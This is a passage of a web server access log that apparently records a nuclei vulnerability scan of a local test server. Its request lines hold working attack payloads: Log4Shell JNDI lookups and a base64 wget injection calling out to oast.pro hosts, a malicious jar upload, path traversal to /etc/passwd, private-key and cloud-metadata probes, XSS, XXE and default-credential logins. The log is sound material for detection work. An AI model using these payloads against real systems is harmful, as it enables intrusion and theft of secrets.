Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RestAPI/ImportTechnicians HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/phpmailer/phpmailer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/computeMetadata/v1/project/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.389","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/log.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"j_username=system&j_password=password&j_character_encoding=UTF-8","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/designs/xh1x.childrenlist.json//%3Csvg%20onload=alert%28document.domain%29%3E.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"j_username=${jndi:ldap://${hostName}.ca28bc0smpvbbtig07h0bquscy1cmubx4.oast.pro}&j_password=password&logincontext=employee","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1/mifs/user/login.jsp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RichWidgets/Popup_Upload.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"{\x22username\x22:\x22nuclei_29KBxZGyUumTGdAmMqbYLRes17U\x22,\x22password\x22:\x2229KBxbutysMUol86eXTvg9DKhQq\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"\x0D\x0A\x0D\x0A mt.handler_to_coderef\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A YHdnZXQgaHR0cDovL2NhMjhiYzBzbXB2YmJ0aWcwN2gwcHI3dGFxaGs1c2tyNC5vYXN0LnByb2A=\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/spider.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/submissions HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x2229KBxhlxmICf6DRMoPavHFDhkf5.jar\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0APK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00META-INF/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00META-INF/MANIFEST.MF\xF3M\xCC\xCBLK-.\xD1\x0DK-*\xCE\xCC\xCF\xB3R0\xD43\xE0\xE5r,J\xCE\xC8,K-B\x08\x07\xE4\xA4V\x94\x16+\xC0$x\xB9\x9CJ3sJt\x9D*\xAD\x14RRRx\xB9\x9C\x8BR\x13KRS\xC0\x02\x8E\x05\x89\xC9\x19\xA9\x0A\xBE\x89e\xA9y\x0A\xC6z\x16z\x86\x10\xE5)\xBA^)\xD9 \x1B,\xF4\x0C\xE2\x8D\x0D\x81\xA2\xBC\x5C\x00PK\x03\x04\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00Evil.class}T\xD9Z\xD3@\x18=\xD3mJ\x08\x14\xCB\x22\xB8\xE3Z\x14\xA8\x0B\x88R\xC4\x05Q\xAB- \x15$\xE2\x96\xA6#\x04\xDA\x04\xD3\xC4O\x9F\x88[\xBD\x01\x94O/\xBD\xF0Y|\x06\xF1\x9F\xB4B\x0B\xFD\xCC\xC5$s\xCE\xBF\x9E\xFC3\xBF\xFE|\xFB\x01`\x08y\x05\x871\xC2qCA\x00#\x0Anb\x94#\x15\xC5X\x14\xB7\xE4n\x9C\xE36\xC7\x1D\x05wqO\x81\x82\x09\x05M\xB8\x1F\xC5\xA4|?h\xC6C<\x92_i\x8E\xC7\x0A\xE2x\x12EFA\x18Y\x8E)\x8Ei\x86\xC8\x98i\x99\xEE8C0\xD17\xCF\x10\x9A\xB0\x0B\x82!\x961-1\xE5\x95\xF2\xC2y\xA6\xE7\x8B\x84\xC43\xB6\xA1\x17\xE7u\xC7\x94\xFB*\x18r\x97\xCD2\xC5\xC8L~0\x8B)\x06\xD5\xF0\xCA\xAE]\xCA\x0Aw\xD9.0\x9COdV\xF4\x0Fz\xB2\xA8[K\xC9\x9C\xEB\x98\xD6R\xAA\xEF Dq\xC4Ga0\xB4\xD7p3\x8Em\x88r\x99\xC8\xD6\xBC\xF7\xEE\x9DpDaV\xE8\x05\xE10tW\xCCL;y\xAF\x8E\x91\x81\x8AT\xB7,\xB6A\x12FD\xE7\xAEkzz\xF2\xA3!\xD6\x5C\xD3\xB6\x88\x0B\x1A%\xAA7\xE2\x88\xB2Wt\x19\xDA*f\x9Ek\x16\x93\x19\xB3\xEC\x92EW}\xFF\x9F\xD6\xFEipv\x9F\xED\xD8\xC1\xDC\xE3\xE4\xDF\x92suc5\xAB\xAF\xF9n\xBE\xFA)\x8E\x19\x8E\xA7\xFE\x0F|\xCC\xA0\xE4l\xCF1\xC4\x03SFm\x92\x8A\x0E\xCAH*\xBA\xD1C\xDA\xECe\xB9\xEB8\xFA'\x99\x8AcVE\x0E\xCF\xA8\xE0\xFD9\x19x2oZ\xC9\xF22C`\xC0P\xD1\x8B9j\xA2\xB1p\x0C=\xBB\xB2Xk\x9EK!\x84^\xAApT\xA0\x8Ay<\x97e,\xC8Ec\x80\x8A\x17X\xA4\xEAU\xBC\xC4+\x15\xAF\xF7\x0A\xACWV\xC5\x1B,\x92\xF2\x8A\x8A\xB7\xD0\xE9\xF7\xC8\xAE\xEA\xAA\x9D\xCE\xAF\x08\x83\x14o\xAD\x17\x91\xE1\xD0\x81Q\xA8\xC3f=\xCB5K$\x94\xB2$\xDC\xDDMg\xA2v\xBC\xAA0\x89\x9FH,\xFE\x7F\x12k\xA6\x8D\xE2\xD5\x88\xC0p\xF8_\xCCzu\xC8\xB4;\xD1\x90\x90\xC7\xA8}\x8F\xAA\xCE\xA6D\xA3\xC4\x172\xFE\x84v$\x1A\x1E\x84\xA0^(\xC862\xFB\x15J\xF5\xBD`\x08\x1BE\xBB\x5C\xED9K\xE5\xEAK\xF2\x0C\xAE\xD8\xA6\xC5p\xA7\xD6gbYwr\xE2\xBD',C\xA4j\xF0\xB4+\x1C9~\x8DN!MH\x17]5\xF2\x09\x80\xC9\xA1\xA3\xF5\x08\xED\x92\xF4\xA6\x7F\x8E\xF0\xC5M\xB0/>}\x94\xD6\x88\x0Fr\x1C\x83\x9C\x07\xDF\x00\xC7q\x82\xDE\x0C'q\xAA\xE2\xCC\xD2\x84F\x08[\xDDF@\xDBD0\xBB\x85P\xE4;\xC2Z0\x1E\xC9i\xA18\xCFi\xE1K\xB9\x0DD\xA7\xB6\xD1\xA4mC\xD1\x066\xD0\xBC\x09u\x13-\xA3\xA1x\xEBh\xB8'\xB4\x81\x986\x1A\xFE\x89X\x7FO\xF8+\xDA\x02x\xBE\xBE\xF3[\xC2\x87\xD6\x11\x9B\xEA'\x87\xF6\x0A\x1C\xEF\xE8\xDFB\xE7gJ\x1D\xC5\x1C\x16\xE8\xBA\x0B\xF9\xA5\x0E\xA2\x99V\x85Py\x0EZ0\x8CV\xBA9c\xB8\x8F6\xCC\x90\xD5\x1Cu\xBE\x80\x0Eh\xE8D\x814\x90-=\xA2\xD6z\xE9\xFE\xED\xC5i\x04\xC9\xE3\x14\xCE\xE0,\xC5\xBBI\xEC9\x9C\xA7\xB64\x8Az\x01\x09b\xA9\xBDj\xEB\xF2\xAB\x8FXY\x81\x81\x8B\xB8Db\xF5W\x05\xAA \x03\x84\x0C\x12r\x19\xA1\x1D\x0A\x16\xE1Hr\x5C\xE6\xB8\xC2q\x95\xE3\x1A}\x03];\x94<\xB8\xCB\x80q\x0C5S\x84a_\xFC\xEB\x7F\x01PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00META-INF/maven/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00META-INF/maven/org.example/PK\x03\x04\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00META-INF/maven/org.example/eviljar/PK\x03\x04\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00META-INF/maven/org.example/eviljar/pom.xml\x85RMo\xC2 \x18\xBE\xF7W4\xBD\x17\xEA\xB6\x83i\x10\xB3\xCB\xB2%:M\xEA\x96]\x09}W1-\x10\xC0\xB6?\x7F\x0C\xD4\xD4D#\xB7\xF7\xF9x?\x9E@\x96c\xD7\xA6=\x18+\x94\x5Cd3Td)H\xAEj!\x9BE\xF6\xB5{\xCB\xE7\xD9\x92&D\x1Bu\x00\xEER\xAF\x96v\x91\xED\x9D\xD3%\xC6\x1D\xEBA\x22\xA6\x19\xDF\x03R\xA6\xC1\xDB\xCD\x1A\xBF\xA0\xC2wI\xD2\xF3\x0B\x96r\xB4\xE2b\x1B\x86\x01\x0D\xCF\xC1\xF0T\x143\xFC\xB3^U\xBEC\xC7r!\xADc\x92\xC3\xD4nEi\x03\xBBR\x9C\xB9\xB0\xE6\xC3\xF1\xE9=\xC5h\xEB\x08\xE6A\x87|\x9D\xD10\x8Ct\xAA\x86\xF6;&A\x03K\xF0\x15\x96D]c\xD4Q\x7F\xD4\xD4\xB7C0\xB2N\xB7@\xF0\x19\x8C\x12f\x9C\xF8e\xDCy\x00z\xD1\x1E\x98!x\x82E\xD1)t\xEA3\xCF\xAB\xCF\xD7m\xF5\xBE\xD9\x11\xDC_\x0F\xF3\xB9k\xF0N\xB0\xF4\x12\x09\x89Wq\xD5i\xD1\x82AV\x1D\x0D\x07:'\xF86q\xD7\xE8\x98i\xC0\xDD0\x9E\x88\xB8\x02\x9E\xEE\x90\x84\xF2\xFF+\xD0?PK\x03\x04\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00META-INF/maven/org.example/eviljar/pom.properties\x0D\xC8K\x0A\xC20\x10\x00\xD0\xFD\xC0\xDCa\xA0kK\x92\x8DX\xE8B\x04\x7F\xE0\x07\xD2\x0B\x8CvZ\x225)c\x0Cz{}\xCBW\xED$\x8Ar\x96\x9En_:q\x91\x88Pm5\xD0\x91#\x99%\x99Ucm\xE3\x0Cm|G\xCE8\x87PD_!\xC5\xD6\xD6f\xE1\xCF\xEB\xAB\xDF_:\x84Q\xD3{>\xF4m\xD2\xB1\x96\x0F?\xE7I\x10Xs\x18\xF8\x9E\xFF/%L\x0FV\x84\x1FPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xEDA\x00\x00\x00\x00META-INF/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD5J'T\xE6([7j\x00\x00\x00\x81\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81'\x00\x00\x00META-INF/MANIFEST.MFPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xD6J'Tb\xED\xA9)^\x03\x00\x00\x1C\x06\x00\x00\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xC3\x00\x00\x00Evil.classPK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFI\x04\x00\x00META-INF/maven/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFFv\x04\x00\x00META-INF/maven/org.example/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x00\x00\xD6J'T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00#\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\xFF\xFF\xAF\x04\x00\x00META-INF/maven/org.example/eviljar/PK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00\xC2H'TR\xFE\xB1L\x16\x01\x00\x00;\x02\x00\x00*\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81\xF0\x04\x00\x00META-INF/maven/org.example/eviljar/pom.xmlPK\x01\x02\x14\x03\x0A\x00\x00\x00\x08\x00kI'TG\xCF\xAA\xA7s\x00\x00\x00s\x00\x00\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA4\x81N\x06\x00\x00META-INF/maven/org.example/eviljar/pom.propertiesPK\x05\x06\x00\x00\x00\x00\x08\x00\x08\x00?\x02\x00\x00\x10\x07\x00\x00\x00\x00\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX\x0D\x0AContent-Disposition: form-data; name=\x22request\x22; filename=\x22blob\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0Anull\x0D\x0A------WebKitFormBoundaryreButJNjkCniQExX--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugin/add HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var/jwt/private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652852166\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652852166\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prometheus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://${hostName}.uri.ca28bc0smpvbbtig07h0eufuhub9qfc63.oast.pro/a} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com 